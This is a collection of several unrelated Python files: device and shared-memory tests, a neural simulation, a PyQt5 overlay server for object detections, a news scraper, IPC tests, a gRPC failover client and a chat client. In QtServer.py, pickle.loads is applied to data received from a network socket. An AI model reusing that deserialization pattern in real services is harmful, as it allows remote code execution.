        if not start_mdns_listener.wait(timeout=5):
            raise ValueError('Test has failed: mdns listener thread did not start')
        # query dns service from host, answer should be received from esp board
        test_query_dns_http_service(SERVICE_NAME)
        # query dns sub-service from host, answer should be received from esp board
        test_query_dns_sub_service(SUB_SERVICE_NAME)
        # query dns host name, answer should be received from esp board
        test_query_dns_host(specific_host)
        # query dns host name delegated, answer should be received from esp board
        test_query_dns_host_delegated(specific_host)
        # query dns-host from esp board, answer should be received from host
        start_case('CONFIG_TEST_QUERY_HOST', 'Query tinytester.local', 'tinytester.local resolved to: 127.0.0.1')
        # query dns-host asynchronously from esp board, answer should be received from host
        start_case('CONFIG_TEST_QUERY_HOST_ASYNC', 'Query tinytester.local async', 'Async query resolved to A:127.0.0.1')
        # query service from esp board, answer should be received from host
        start_case('CONFIG_TEST_QUERY_SERVICE', 'Query SRV ESP32._http._tcp.local', 'SRV:ESP32')
    finally:
        # Always stop and join the listener thread, even on failure.
        stop_mdns_listener.set()
        mdns_responder.join()
if __name__ == '__main__':
    # Allow running this test case directly, outside the CI runner.
    test_app_esp_mdns()
|
test_shared_ndarray.py | import multiprocessing as mp
import unittest
import numpy as np
from . import SharedNDArray, SharedNDArrayError
class TestSharedNDArray(unittest.TestCase):
    """Tests for SharedNDArray: creation, cross-process sharing, copying,
    and unlink semantics."""

    def test_create(self):
        # A child process incrementing the shared array must be visible to
        # the parent afterwards.
        try:
            shm = SharedNDArray(4)
            shm.array[0] = 1

            def write_to_shm(q):
                # Child: fetch the SharedNDArray from the queue and bump it.
                # NOTE(review): passing a locally-defined function as a
                # Process target only works with the 'fork' start method —
                # confirm the suite only runs where fork is the default.
                shm = q.get()
                shm.array += 1

            q = mp.Queue()
            p = mp.Process(target=write_to_shm, args=(q,))
            p.start()
            q.put(shm)
            p.join()
            self.assertEqual(shm.array[0], 2)
        finally:
            shm.unlink()

    def test_unlink_twice(self):
        # Unlinking an already-unlinked array raises SharedNDArrayError.
        shm = SharedNDArray(4)
        shm.unlink()
        with self.assertRaises(SharedNDArrayError):
            shm.unlink()

    def test_unlink_two_processes(self):
        # If a child process unlinks the array, the parent cannot unlink it.
        shm = SharedNDArray(4)
        q = mp.Queue()
        p = mp.Process(target=lambda q: q.get().unlink(), args=(q,))
        p.start()
        q.put(shm)
        p.join()
        with self.assertRaises(SharedNDArrayError):
            shm.unlink()

    def test_copy(self):
        # copy() preserves shape, dtype and contents of the source array.
        try:
            arr = np.array(range(4))
            shm = SharedNDArray.copy(arr)
            self.assertEqual(arr.shape, shm.array.shape)
            self.assertEqual(arr.dtype, shm.array.dtype)
            self.assertTrue((arr == shm.array).all())
        finally:
            shm.unlink()

    def test_zeros_like(self):
        # zeros_like() matches shape/dtype but contains only zeros.
        try:
            arr = np.array(range(4))
            shm = SharedNDArray.zeros_like(arr)
            self.assertEqual(arr.shape, shm.array.shape)
            self.assertEqual(arr.dtype, shm.array.dtype)
            self.assertTrue((shm.array == 0).all())
        finally:
            shm.unlink()
if __name__ == '__main__':
    # Allow running this test module directly.
    unittest.main()
|
sim.py | #!/usr/bin/env python3
import csv
import numpy
import multiprocessing
def sigmoid(x):
    """Logistic function centered at 5; works elementwise on arrays."""
    return 1.0 / (1.0 + numpy.exp(5.0 - x))
def sim_func(q,alpha,beta,Nalpha,Nbeta):
    """Simulate one soma/dendrite two-compartment unit with plastic inputs
    and put a single result tuple on `q`.

    The tuple is (Nalpha, Nbeta, wdif_som, wdif_dnd), where wdif_* is the
    final group-1 weight mass minus the remaining weight mass for the
    somatic / dendritic compartment respectively.

    Args:
        q: multiprocessing.Queue receiving the single result tuple.
        alpha: plasticity mixing parameter (applied to both compartments).
        beta: soma<->dendrite coupling strength (both directions).
        Nalpha, Nbeta: grid indices of this (alpha, beta) combination,
            echoed into the result for later reassembly.
    """
    #parameters
    time_pitch=1.0 #ms (Euler integration step)
    save_pitch=10  # NOTE(review): unused in this function
    save_pitch_weight=1000  # NOTE(review): unused in this function
    simlen_sec=900.0
    simlen=int(simlen_sec*1000.0/time_pitch)
    tauL=10.0 #ms (leak / synaptic time constant)
    phi=80.0/1000.0  # output rate scale (per ms)
    phi_input=80.0/1000.0  # input rate scale (per ms)
    alpha_som=alpha
    alpha_dnd=alpha
    beta_som=beta
    beta_dnd=beta
    gamma=1.0  # dendritic gain applied to the output z
    c0=70.0  # scale of the sliding plasticity threshold
    eta_som=0.2  # somatic learning rate
    eta_dnd=0.2  # dendritic learning rate
    taudeltaW=1.0*1000.0 #ms (low-pass filter on the weight updates)
    tau_mean=60.0*1000.0  # ms; running-average time constant for x and y
    eta_Wdecay=1e-7  # weight decay rate
    Wnoise_amp=5e-3/numpy.sqrt(time_pitch)  # weight diffusion amplitude
    som_input_num=50
    dnd_input_num=som_input_num+0
    group1_num=10  # the first group1_num inputs follow source 0
    input_src_num=4
    tau_input=10.0 #ms
    input_amp=0.1/numpy.sqrt(time_pitch)
    noise_amp=0.1/numpy.sqrt(time_pitch)
    Winit=5.0
    Wmin=0.0
    E0=0.05
    #variables
    x=0.0  # somatic activity
    y=0.0  # dendritic activity
    Ex=E0  # running average of x
    Ey=E0  # running average of y
    input_src=numpy.zeros(input_src_num)
    som_input_current=numpy.zeros(som_input_num)
    dnd_input_current=numpy.zeros(dnd_input_num)
    som_inputPSC=numpy.zeros(som_input_num)
    dnd_inputPSC=numpy.zeros(dnd_input_num)
    deltaWsom=numpy.zeros(som_input_num)
    deltaWdnd=numpy.zeros(dnd_input_num)
    Wsom=Winit*(numpy.random.rand(som_input_num))
    Wdnd=Winit*(numpy.random.rand(dnd_input_num))
    # Source-mixing matrices: group 1 follows source 0; the remaining inputs
    # follow source 2 (soma) / source 3 (dendrite).
    som_src=numpy.zeros([som_input_num, input_src_num])
    som_src[:group1_num, 0]=1.0
    som_src[group1_num:, 2]=1.0
    dnd_src=numpy.zeros([dnd_input_num, input_src_num])
    dnd_src[:group1_num,0]=1.0
    dnd_src[group1_num:,3]=1.0
    #simulation
    for t in range(simlen):
        time_sec=float(t)*time_pitch/1000.0
        #if time_sec==int(time_sec):
        #    print(time_sec,"sec")
        #source signal: leaky integration of white noise (OU-like)
        input_src=input_src+time_pitch*(-input_src/tau_input+input_amp*numpy.random.randn(input_src_num))
        #inputs: mix the sources, add per-input noise, then rate-filter
        som_input_current+=time_pitch*(-som_input_current/tauL+som_src@input_src+noise_amp*numpy.random.randn(som_input_num))
        dnd_input_current+=time_pitch*(-dnd_input_current/tauL+dnd_src@input_src+noise_amp*numpy.random.randn(dnd_input_num))
        som_input=phi_input*sigmoid(som_input_current)
        dnd_input=phi_input*sigmoid(dnd_input_current)
        som_inputPSC+=time_pitch*(-som_inputPSC/tauL+som_input)
        dnd_inputPSC+=time_pitch*(-dnd_inputPSC/tauL+dnd_input)
        #dynamics: soma and dendrite drive each other with strength beta,
        #each seeing the other's previous-step activity
        xprev=x+0.0
        yprev=y+0.0
        Isom=Wsom@som_inputPSC
        Idnd=Wdnd@dnd_inputPSC
        x=sigmoid(Isom+beta_som*yprev)
        y=sigmoid(Idnd+beta_dnd*xprev)
        z=(1.0+gamma*y)*phi*x  # NOTE(review): z is computed but never used
        #plasticity
        #som: apply filtered update + noise + decay, clip at Wmin
        Wsom+=time_pitch*(eta_som*deltaWsom+Wnoise_amp*numpy.random.randn(som_input_num)-eta_Wdecay*Wsom)
        Wsom[Wsom<Wmin]=Wmin
        theta_som=c0*Ex*Ex  # sliding threshold from the running average
        deltaWsom+=time_pitch*(-deltaWsom+((1.0-alpha_som)*x*(x-theta_som)+alpha_som*x*y)*(1.0-x)*som_inputPSC)/taudeltaW
        #dnd: same update rule for the dendritic compartment
        Wdnd+=time_pitch*(eta_dnd*deltaWdnd+Wnoise_amp*numpy.random.randn(dnd_input_num)-eta_Wdecay*Wdnd)
        Wdnd[Wdnd<Wmin]=Wmin
        theta_dnd=c0*Ey*Ey
        deltaWdnd+=time_pitch*(-deltaWdnd+((1.0-alpha_dnd)*y*(y-theta_dnd)+alpha_dnd*x*y)*(1.0-y)*dnd_inputPSC)/taudeltaW
        Ex+=time_pitch*(-Ex+x)/tau_mean
        Ey+=time_pitch*(-Ey+y)/tau_mean
    # Final selectivity: group-1 weight mass minus the rest, per compartment.
    wdif_som=numpy.sum(Wsom[:group1_num])-numpy.sum(Wsom[group1_num:])
    wdif_dnd=numpy.sum(Wdnd[:group1_num])-numpy.sum(Wdnd[group1_num:])
    q.put((Nalpha,Nbeta,wdif_som,wdif_dnd))
if __name__=="__main__":
    # Sweep the (alpha, beta) grid, running up to max_process simulations in
    # parallel, then dump the axes and the collected results to CSV.
    alpha = numpy.arange(0.0, 1.0, 0.1)
    beta = numpy.arange(0.0, 10.0, 1.0)
    max_process = 40
    que = multiprocessing.Queue()
    process_arr = []
    results = []
    process_num = 0
    for i in range(len(alpha)):
        for j in range(len(beta)):
            print(alpha[i], beta[j])
            process_arr.append(multiprocessing.Process(
                target=sim_func, args=(que, alpha[i], beta[j], i, j)))
            process_arr[-1].start()
            process_num += 1
            if process_num >= max_process:
                # Drain the queue BEFORE joining: a child process does not
                # exit until everything it put on the queue is consumed, so
                # the original join-then-get order can deadlock (see the
                # multiprocessing "Joining processes that use queues"
                # guideline). Harmless here only because each result is tiny.
                for k in range(process_num):
                    results.append(que.get())
                for k in range(process_num):
                    process_arr[k].join()
                process_arr.clear()
                process_num = 0
    # Handle the final partial batch the same way.
    for k in range(process_num):
        results.append(que.get())
    for i in range(process_num):
        process_arr[i].join()
    # NOTE: result rows arrive in completion order; the (Nalpha, Nbeta)
    # columns in wdif.csv identify each row's grid position.
    numpy.savetxt("alpha.csv", alpha, delimiter=",")
    numpy.savetxt("beta.csv", beta, delimiter=",")
    numpy.savetxt("wdif.csv", results, delimiter=",")
|
QtServer.py | import threading
import sys
sys.path.insert(0,'..')
import os
from utils import label_map_util
from screen_overlay_handler import *
import socket
import pickle
import numpy as np
from PyQt5.QtCore import *
from PyQt5.QtWidgets import QApplication
import sys
import screen_overlay_handler
"""
COPYRIGHT @ Grebtsew 2019
QtServer recieves detection boxes and visualize them.
"""
# Tunable display/filter parameters.
MAX_DETECTION = 5  # (the original defined this twice; kept once)
MAX_BOX_AREA = 1000000  # pixels^2 — ignore boxes larger than this
PRECISION = 0.6  # 60 % detection threshold
WIDTH = 1920   # screen width used to rescale normalized boxes
HEIGTH = 1080  # screen height (misspelled name kept: other code uses HEIGTH)
SHOW_ONLY = ["person"]  # visualize only these classes; empty list = show all
BOX_VIS_TIME = 0.2  # in seconds
# Dont change these: shared state between the server thread and the GUI loop.
# NOTE: these names shadow the builtins `list` and `queue`, but the rest of
# the module refers to them by exactly these names, so they are kept.
list = []   # currently displayed overlay boxes: (box_widget, created_at)
queue = []  # pending detections: (score, class, x, y, w, h)
class QtServer(threading.Thread):
    """Threaded TCP server that receives pickled TensorFlow detection
    results and appends qualifying detections to the module-level `queue`
    for the main-thread PyQt5 overlay painter."""

    def __init__(self, address, port):
        # address/port: where to listen for the detector's TCP connections.
        super(QtServer,self).__init__()
        self.address = address
        self.port = port
        self.categorylist = self.load_tf_categories()

    def load_tf_categories(self):
        """Load the MS-COCO label map and return the category list."""
        self.NUM_CLASSES = 90
        CWD_PATH = os.path.dirname(os.getcwd())
        self.PATH_TO_LABELS = os.path.join(CWD_PATH,'object_detection', 'data', 'mscoco_label_map.pbtxt')
        self.label_map = label_map_util.load_labelmap(self.PATH_TO_LABELS)
        self.categories = label_map_util.convert_label_map_to_categories(self.label_map, max_num_classes=self.NUM_CLASSES, use_display_name=True)
        self.category_index = label_map_util.create_category_index(self.categories)
        return self.categories

    def handle_connection(self, conn):
        """Read pickled (boxes, scores, classes, count) payloads from one
        connection and enqueue detections that pass the filters.

        SECURITY NOTE(review): pickle.loads on bytes received from the
        network can execute arbitrary code — only safe with a trusted,
        local detector process.
        """
        with conn:
            while True:
                data = conn.recv(50000) # approx larger than the incoming tf result
                if not data:
                    break
                else:
                    try:
                        dict = pickle.loads(data)
                    except Exception:
                        # A single recv() may return a partial pickle; the
                        # truncated payload is simply dropped.
                        continue # If for some reason not entire package is recieved!
                    boxes = np.squeeze(dict[0])
                    scores = np.squeeze(dict[1])
                    classification = np.squeeze(dict[2])
                    amount = np.squeeze(dict[3])
                    # loop through all detections
                    for i in range(0,len(boxes)):
                        # Rescale the normalized [y0, x0, y1, x1] box to
                        # screen pixels.
                        x = int(WIDTH*boxes[i][1])
                        y = int(HEIGTH*boxes[i][0])
                        w = int(WIDTH*(boxes[i][3]-boxes[i][1]))
                        h = int(HEIGTH*(boxes[i][2]-boxes[i][0]))
                        c = ""
                        # Map the class index to its label, if in bounds.
                        if len(self.categorylist) >= classification[i]:
                            c = str(self.categorylist[int(classification[i]-1)]['name'])
                        if len(SHOW_ONLY) > 0: # dont show filtered-out classes
                            if not SHOW_ONLY.__contains__(c):
                                continue
                        if scores[i] > PRECISION: # precision threshold
                            if w*h < MAX_BOX_AREA : # max box size check
                                queue.append((scores[i], c,x,y,w,h)) # save all vis data in queue

    def run(self):
        """Accept connections forever, handling each on its own thread."""
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.bind((self.address, self.port))
            s.listen()
            print("Qt Server started at ", self.address, self.port )
            while True:
                conn, addr = s.accept()
                threading.Thread(target=self.handle_connection, args=(conn,)).start()
def show_rect(scores, c,x,y,w,h):
    # Create an overlay box (image + score + class label) at (x, y, w, h) and
    # record it with its creation time so it can be expired later.
    # NOTE(review): `time` is not imported in this file directly; presumably
    # it comes from `from screen_overlay_handler import *` — confirm.
    list.append((screen_overlay_handler.create_box_with_image_score_classification("../images/square2.png",scores,c,x,y,w,h), time.time()))
def remove_old_detections():
    """Expire overlay boxes older than BOX_VIS_TIME seconds.

    Bug fix: the original called list.remove() while iterating the same
    list, which skips the element following each removal. The list is now
    rebuilt with a slice assignment, which also preserves the module-global
    alias that other functions share.
    """
    now = time.time()
    list[:] = [box for box in list if now - box[1] <= BOX_VIS_TIME]
def paint_rects():
    """Flush all queued detections into overlay boxes, then drop expired
    ones. Must run on the main (Qt) thread."""
    if len(queue) > 0:
        for score, label, x, y, w, h in queue:
            show_rect(score, label, x, y, w, h)
        queue.clear()
    else:
        # Nothing pending: back off briefly to avoid spinning.
        time.sleep(0.1)
    remove_old_detections()
if __name__ == '__main__':
    app = QApplication(sys.argv) # create window handler
    # (address, port) pairs; only the first entry is used.
    QtServer_address= [["127.0.0.1",8081]]
    qtserver = QtServer(QtServer_address[0][0],QtServer_address[0][1])
    qtserver.start()
    # Qt widgets must be created/painted on the MAIN thread (required!),
    # so the painting loop runs here while the server thread fills `queue`.
    while True:
        paint_rects()
|
naverpop.py | import requests
import time
import sys
import json
from urllib import parse
from bs4 import BeautifulSoup
from threading import Thread
mod = sys.modules[__name__]
global totalNewsData
totalNewsData = {}
def getRankList():
    """Scrape the Naver homepage and return the realtime trending keywords."""
    url = "https://www.naver.com"
    soup = BeautifulSoup(requests.get(url).text, "html.parser")
    return [item.text for item in soup.select(".ah_roll_area .ah_k")]
def append_list(idx,keyword):
    """Search Naver news for `keyword` and store the parsed articles in the
    shared totalNewsData dict under key `idx` (thread worker)."""
    global totalNewsData
    search_url = "https://search.naver.com/search.naver?where=nexearch&sm=tab_jum&query=" + parse.quote(keyword)
    soup = BeautifulSoup(requests.get(search_url).text, "html.parser")
    articles = []
    for dl, img in zip(soup.select("._prs_nws_all dl"),
                       soup.select("._prs_nws_all .thumb img")):
        articles.append({
            "news_thumb": img.get("src"),
            "news_title": dl.select("a")[0].get("title"),
            "news_des": dl.select("dd")[1].text,
            "news_link": dl.select("a")[0].get("href"),
        })
    totalNewsData.update({idx: {"keyword": keyword, "data": articles}})
def auto_run():
    """Fetch news for every trending keyword (one thread per keyword) and
    write the combined result to new_list.json.

    Side effect kept from the original: the module-global ``totalNewsData``
    is first rebound to a fresh dict (filled by the worker threads) and
    finally to its JSON string.

    Fixes over the original: threads are held in a plain list instead of
    being created as dynamic module attributes (th1, th2, ...) via setattr;
    the output file is opened with a context manager so it is closed even
    if the write fails; the redundant str() around the JSON string is gone.
    NOTE(review): nothing visible here reads the old th1/th2/... attributes,
    but confirm no external code depended on them.
    """
    global totalNewsData
    totalNewsData = {}
    rank_list = getRankList()
    # One worker thread per keyword; idx+1 (as a string) is the result key.
    threads = [
        Thread(target=append_list, args=(str(idx + 1), keyword))
        for idx, keyword in enumerate(rank_list)
    ]
    for th in threads:
        th.start()
    for th in threads:
        th.join()
    totalNewsData = json.dumps(totalNewsData)
    with open("new_list.json", "w", encoding='utf8') as f:
        f.write(totalNewsData)
test_ipc2.py | import pytest
def test_pack_unpack():
    """A header tuple round-trips through _pack_header/_unpack_header and
    exposes named fields."""
    from gpopup.ipc import _pack_header, _unpack_header
    kind, length = 'json', 301
    unpacked = _unpack_header(_pack_header(kind, length))
    assert ('json', 301) == unpacked
    assert unpacked.type == kind
    assert unpacked.length == length
def test_test_get_client(IpcServer):
    """A client built via get_client() shares the server's socket name."""
    client = IpcServer.get_client()()
    server = IpcServer()
    assert client.sock_name == server.sock_name
def test_ping(echo_client):
    """A live echo server answers ping with True."""
    response = echo_client.ping()
    assert response == True
def test_pargs(echo_client):
    """Positional arguments survive the echo round-trip unchanged."""
    sent = (9, 8, 7)
    got_args, got_kw = echo_client.echo(*sent)
    assert sent == got_args
    assert {} == got_kw
def test_kwargs(echo_client):
    """Keyword arguments survive the echo round-trip unchanged."""
    sent = dict(a=[0, 1, 2], b='some string', c=print)
    got_args, got_kw = echo_client.echo(**sent)
    assert () == got_args
    assert sent == got_kw
def test_adding_cmds(MathServer):
    """Commands registered on the server become methods on the client class."""
    client_cls = MathServer.get_client()
    for cmd in ('cos', 'erf'):
        assert cmd in client_cls.__dict__
def test_calc(math_client):
    """Remote math commands agree with the local math module."""
    import math
    assert math_client.cos(0.5) == pytest.approx(math.cos(0.5))
    assert math_client.erf(0.1) == pytest.approx(math.erf(0.1))
def test_json(IpcServer):
    """Switching the serializer to JSON propagates to clients and round-trips data.

    NOTE(review): this mutates a class attribute on the IpcServer fixture --
    presumably the fixture yields a fresh class per test; verify in conftest.
    """
    assert IpcServer.serial_method == 'pickle'
    IpcServer.serial_method = 'json'
    assert IpcServer.serial_method == 'json'
    Client = IpcServer.get_client()
    assert Client.serial_method == 'json'
    c = Client()
    c.start_server_maybe()
    pargs, kwargs = c.echo(42)
    assert c.serial_method == 'json'
    assert kwargs == {}
    # JSON has no tuple type, so the positional args come back as a list.
    assert pargs == [42,]
    c.kill_server()
def test_no_server(IpcServer):
    """Pinging without a running server raises ConnectionError."""
    client = IpcServer.get_client()()
    with pytest.raises(ConnectionError):
        client.ping()
def test_busy(IpcServer):
    """A second server on the same socket must refuse to run (run() == False)."""
    serv = IpcServer()
    serv2 = IpcServer()
    assert serv.sock_name == serv2.sock_name
    Client = serv.get_client()
    c = Client()
    # No server started yet, so pings fail.
    with pytest.raises(ConnectionError):
        c.ping()
    serv.run(background=True)
    assert c.ping() == True
    # The socket is busy, so the second server cannot start.
    assert serv2.run() == False
    c.kill_server()
def test_foreground(IpcServer):
    """A server run in the foreground (background=False) serves requests
    until kill_server() makes run() return and the thread exit."""
    serv = IpcServer()
    Client = serv.get_client()
    c = Client()
    # Not running yet.
    with pytest.raises(ConnectionError):
        c.ping()
    import threading
    # run(background=False) blocks, so host it in a helper thread.
    run = lambda: serv.run(background=False)
    t = threading.Thread(target=run)
    t.start()
    assert c.ping() == True
    assert c.echo(37, wow='okay') == ((37,), {'wow': 'okay'})
    c.kill_server()
    # The foreground run() should return promptly after the kill.
    t.join(1)
def test_fail_cmd(echo_client):
    """Unknown commands raise AttributeError; known ones still work."""
    ok = echo_client.run_cmd('ping')
    assert ok == True
    with pytest.raises(AttributeError):
        echo_client.run_cmd('asdfasdf', 1, 3)
|
aiflow_client.py | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import threading
from random import shuffle
import grpc
import logging
import time
from functools import wraps
from ai_flow.project.project_config import ProjectConfig
from ai_flow.rest_endpoint.protobuf.deploy_service_pb2_grpc import DeployServiceStub
from ai_flow.rest_endpoint.protobuf.high_availability_pb2 import ListMembersRequest, ReturnStatus
from ai_flow.rest_endpoint.protobuf.high_availability_pb2_grpc import HighAvailabilityManagerStub
from ai_flow.rest_endpoint.protobuf.metadata_service_pb2_grpc import MetadataServiceStub
from ai_flow.rest_endpoint.protobuf.metric_service_pb2_grpc import MetricServiceStub
from ai_flow.rest_endpoint.protobuf.model_center_service_pb2_grpc import ModelCenterServiceStub
from ai_flow.rest_endpoint.service.high_availability import proto_to_member, sleep_and_detecting_running
from notification_service.base_notification import BaseEvent
from ai_flow.notification.event_types import AI_FLOW_TYPE
from ai_flow.rest_endpoint.service.client.deploy_client import DeployClient
from ai_flow.rest_endpoint.service.client.metadata_client import MetadataClient
from ai_flow.rest_endpoint.service.client.model_center_client import ModelCenterClient
from notification_service.client import NotificationClient
from ai_flow.rest_endpoint.service.client.metric_client import MetricClient
# Python < 3.7 lacks time.time_ns; emulate it so the retry-timeout code below
# can use nanosecond timestamps uniformly.
if not hasattr(time, 'time_ns'):
    time.time_ns = lambda: int(time.time() * 1e9)
# Default AIFlow server address used when neither an explicit uri nor a
# project config supplies one.
_SERVER_URI = 'localhost:50051'
class AIFlowClient(MetadataClient, ModelCenterClient, NotificationClient, DeployClient, MetricClient):
    """
    Client of an AIFlow Server that manages metadata store, model center and notification service.

    When high availability is enabled in the project config, the constructor
    discovers the living server members, wraps every gRPC stub method with
    failover/retry logic, and keeps the member list fresh from a background
    daemon thread.
    """
    def __init__(self,
                 server_uri=_SERVER_URI,
                 notification_service_uri=None,
                 project_config: ProjectConfig = None):
        MetadataClient.__init__(self, server_uri)
        ModelCenterClient.__init__(self, server_uri)
        DeployClient.__init__(self, server_uri)
        MetricClient.__init__(self, server_uri)
        # HA defaults; overridden below when a project config is supplied.
        self.enable_ha = False
        self.list_member_interval_ms = 5000
        self.retry_interval_ms = 1000
        self.retry_timeout_ms = 10000
        if project_config is not None:
            # NOTE(review): server_uri is only taken from the config when the
            # caller passed None, but the parent __init__ calls above already
            # received the original (None) value -- confirm this is intended.
            if server_uri is None:
                server_uri = project_config.get_master_uri()
            if notification_service_uri is None:
                notification_service_uri = project_config.get_notification_service_uri()
            self.enable_ha = project_config.get_enable_ha()
            self.list_member_interval_ms = project_config.get_list_member_interval_ms()
            self.retry_interval_ms = project_config.get_retry_interval_ms()
            self.retry_timeout_ms = project_config.get_retry_timeout_ms()
        # The notification service may have its own uri; fall back to the
        # AIFlow server uri when none is configured.
        if notification_service_uri is None:
            NotificationClient.__init__(
                self,
                server_uri,
                enable_ha=self.enable_ha,
                list_member_interval_ms=self.list_member_interval_ms,
                retry_interval_ms=self.retry_interval_ms,
                retry_timeout_ms=self.retry_timeout_ms)
        else:
            NotificationClient.__init__(
                self,
                notification_service_uri,
                enable_ha=self.enable_ha,
                list_member_interval_ms=self.list_member_interval_ms,
                retry_interval_ms=self.retry_interval_ms,
                retry_timeout_ms=self.retry_timeout_ms)
        if self.enable_ha:
            # server_uri may be a comma-separated member list; probe each
            # member until one answers a listMembers request.
            server_uris = server_uri.split(",")
            self.living_aiflow_members = []
            self.current_aiflow_uri = None
            last_error = None
            for server_uri in server_uris:
                channel = grpc.insecure_channel(server_uri)
                high_availability_stub = HighAvailabilityManagerStub(channel)
                try:
                    request = ListMembersRequest(timeout_seconds=0)
                    response = high_availability_stub.listMembers(request)
                    if response.return_code == ReturnStatus.CALL_SUCCESS:
                        self.living_aiflow_members = [proto_to_member(proto).server_uri
                                                      for proto in response.members]
                    else:
                        raise Exception(response.return_msg)
                    self.current_aiflow_uri = server_uri
                    self.high_availability_stub = high_availability_stub
                    break
                except grpc.RpcError as e:
                    last_error = e
            if self.current_aiflow_uri is None:
                raise Exception("No available aiflow server uri!") from last_error
            self.aiflow_ha_change_lock = threading.Lock()
            self.aiflow_ha_running = True
            # Re-create every stub against the chosen member, each method
            # wrapped with the retry logic in _aiflow_ha_wrapper.
            self._replace_aiflow_stubs(self.current_aiflow_uri)
            self.list_aiflow_member_thread = threading.Thread(target=self._list_aiflow_members, daemon=True)
            self.list_aiflow_member_thread.start()
    def publish_event(self, key: str, value: str, event_type: str = AI_FLOW_TYPE) -> BaseEvent:
        """Build a BaseEvent from key/value and send it via the notification service."""
        return self.send_event(BaseEvent(key, value, event_type))
    def _list_aiflow_members(self):
        """Background loop: periodically refresh living_aiflow_members until HA is disabled."""
        while self.aiflow_ha_running:
            # refresh the living members
            request = ListMembersRequest(timeout_seconds=int(self.list_member_interval_ms / 1000))
            response = self.high_availability_stub.listMembers(request)
            if response.return_code == ReturnStatus.CALL_SUCCESS:
                with self.aiflow_ha_change_lock:
                    self.living_aiflow_members = [proto_to_member(proto).server_uri
                                                  for proto in response.members]
            else:
                logging.error("Exception thrown when updating the living members: %s" %
                              response.return_msg)
    def _aiflow_ha_wrapper(self, func, stub_name):
        """Wrap stub method *func* so RpcError triggers failover to another member.

        The wrapped call keeps retrying until it succeeds, HA is disabled,
        or retry_timeout_ms elapses since the first attempt.
        """
        @wraps(func)
        def call_with_retry(*args, **kwargs):
            current_stub = getattr(self, stub_name)
            current_func = getattr(current_stub, func.__name__).inner_func
            start_time = time.time_ns() / 1000000
            failed_members = set()
            while True:
                try:
                    return current_func(*args, **kwargs)
                except grpc.RpcError:
                    logging.error("Exception thrown when calling rpc, change the connection.",
                                  exc_info=True)
                    with self.aiflow_ha_change_lock:
                        # check the current_uri to ensure thread safety
                        if current_func.server_uri == self.current_aiflow_uri:
                            living_members = list(self.living_aiflow_members)
                            failed_members.add(self.current_aiflow_uri)
                            shuffle(living_members)
                            found_new_member = False
                            for server_uri in living_members:
                                if server_uri in failed_members:
                                    continue
                                next_uri = server_uri
                                self._replace_aiflow_stubs(next_uri)
                                current_func = getattr(getattr(self, stub_name),
                                                       current_func.__name__).inner_func
                                self.current_aiflow_uri = next_uri
                                found_new_member = True
                                # NOTE(review): there is no break here, so the
                                # stubs are rebuilt for every remaining healthy
                                # member and the last one wins -- confirm
                                # whether a break was intended.
                            if not found_new_member:
                                logging.error("No available living members currently. Sleep and retry.")
                                failed_members.clear()
                                sleep_and_detecting_running(self.retry_interval_ms,
                                                            lambda: self.aiflow_ha_running)
                # break if stopped or timeout
                if not self.aiflow_ha_running or \
                        time.time_ns() / 1000000 > start_time + self.retry_timeout_ms:
                    if not self.aiflow_ha_running:
                        raise Exception("HA has been disabled.")
                    else:
                        raise Exception("Rpc retry timeout!")
        # Keep a handle to the unwrapped method so a failover can re-resolve it.
        call_with_retry.inner_func = func
        return call_with_retry
    def _wrap_aiflow_rpcs(self, stub, server_uri, stub_name):
        """Replace every method on *stub* with its HA retry wrapper."""
        for method_name, method in dict(stub.__dict__).items():
            # Tag the raw method so the wrapper can detect stale connections.
            method.__name__ = method_name
            method.server_uri = server_uri
            setattr(stub, method_name, self._aiflow_ha_wrapper(method, stub_name))
        return stub
    def _replace_aiflow_stubs(self, server_uri):
        """Rebuild all service stubs against *server_uri*, each HA-wrapped."""
        high_availability_channel = grpc.insecure_channel(server_uri)
        high_availability_stub = self._wrap_aiflow_rpcs(
            HighAvailabilityManagerStub(high_availability_channel),
            server_uri,
            "high_availability_stub")
        self.high_availability_stub = high_availability_stub
        metadata_channel = grpc.insecure_channel(server_uri)
        metadata_store_stub = self._wrap_aiflow_rpcs(
            MetadataServiceStub(metadata_channel),
            server_uri,
            "metadata_store_stub")
        self.metadata_store_stub = metadata_store_stub
        model_center_channel = grpc.insecure_channel(server_uri)
        model_center_stub = self._wrap_aiflow_rpcs(
            ModelCenterServiceStub(model_center_channel),
            server_uri,
            "model_center_stub")
        self.model_center_stub = model_center_stub
        deploy_channel = grpc.insecure_channel(server_uri)
        deploy_stub = self._wrap_aiflow_rpcs(
            DeployServiceStub(deploy_channel),
            server_uri,
            "deploy_stub")
        self.deploy_stub = deploy_stub
        metric_channel = grpc.insecure_channel(server_uri)
        metric_stub = self._wrap_aiflow_rpcs(
            MetricServiceStub(metric_channel),
            server_uri,
            "metric_stub")
        self.metric_stub = metric_stub
    def disable_high_availability(self):
        """Stop the HA retry/refresh machinery here and in the notification client."""
        if hasattr(self, "aiflow_ha_running"):
            self.aiflow_ha_running = False
        NotificationClient.disable_high_availability(self)
        if hasattr(self, "aiflow_ha_running"):
            self.list_aiflow_member_thread.join()
|
client.py | import os
import threading
from src.components.client.client import Client
from src.core.utils.channel import Channel
from src.protocol.base import Message
from src.protocol.client.write.initial import InitMessage
from src.protocol.client.write.text_message import TextMessage
def print_messages(client : Client):
    """Consume delivered messages from *client* forever and render them to stdout."""
    delivery = client._delivery_channel
    width, _ = os.get_terminal_size(0)
    while True:
        raw = delivery.consume()
        envelope = Message.initFromJSON(raw)
        envelope.decode()
        header = envelope.header
        if header == "Write: Initial":
            joined = InitMessage.initFromJSON(raw)
            joined.decode()
            print("{} joined the chat".format(joined.identifier).center(width, " "))
        elif header == "Write: TextMessage":
            text_msg = TextMessage.initFromJSON(raw)
            text_msg.decode()
            print("{}: {}".format(text_msg.get_signature()[0], text_msg.text))
def write(client : Client):
    """Read lines from stdin forever and send each one via *client*."""
    while True:
        client.send(input())
def main():
    """Start the chat client plus its printer and writer worker threads."""
